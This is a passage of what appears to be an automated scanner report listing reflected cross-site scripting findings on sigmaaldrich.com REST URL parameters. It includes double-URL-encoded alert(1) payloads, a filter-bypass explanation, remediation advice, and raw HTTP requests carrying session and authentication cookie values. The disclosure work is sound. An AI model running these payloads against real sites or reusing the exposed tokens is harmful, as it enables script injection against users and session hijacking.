WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:46 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib91e58";alert(1)//3437fea45bd/sigma-aldrich/icon-literature","E404") ;
   </script>
...[SNIP]...

1.441. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c6a%2522%253balert%25281%2529%252f%252fe3d60c3693b was submitted in the REST URL parameter 3. This input was echoed as c4c6a";alert(1)//e3d60c3693b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichc4c6a%2522%253balert%25281%2529%252f%252fe3d60c3693b/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:48 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichc4c6a";alert(1)//e3d60c3693b/icon-literature","E404") ;
   </script>
...[SNIP]...

1.442. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2958a%2522%253balert%25281%2529%252f%252fbebe4c7e690 was submitted in the REST URL parameter 4. This input was echoed as 2958a";alert(1)//bebe4c7e690 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/icon-literature2958a%2522%253balert%25281%2529%252f%252fbebe4c7e690 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/icon-literature2958a";alert(1)//bebe4c7e690","E404") ;
   </script>
...[SNIP]...

1.443. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b10%2522%253balert%25281%2529%252f%252f56e6f5e4449 was submitted in the REST URL parameter 1. This input was echoed as 76b10";alert(1)//56e6f5e4449 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc76b10%2522%253balert%25281%2529%252f%252f56e6f5e4449/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc76b10";alert(1)//56e6f5e4449/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.444. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36fdd%2522%253balert%25281%2529%252f%252f5b201a91d0b was submitted in the REST URL parameter 2. This input was echoed as 36fdd";alert(1)//5b201a91d0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib36fdd%2522%253balert%25281%2529%252f%252f5b201a91d0b/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib36fdd";alert(1)//5b201a91d0b/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.445. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dced1%2522%253balert%25281%2529%252f%252f7cc06b185b3 was submitted in the REST URL parameter 3. This input was echoed as dced1";alert(1)//7cc06b185b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichdced1%2522%253balert%25281%2529%252f%252f7cc06b185b3/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
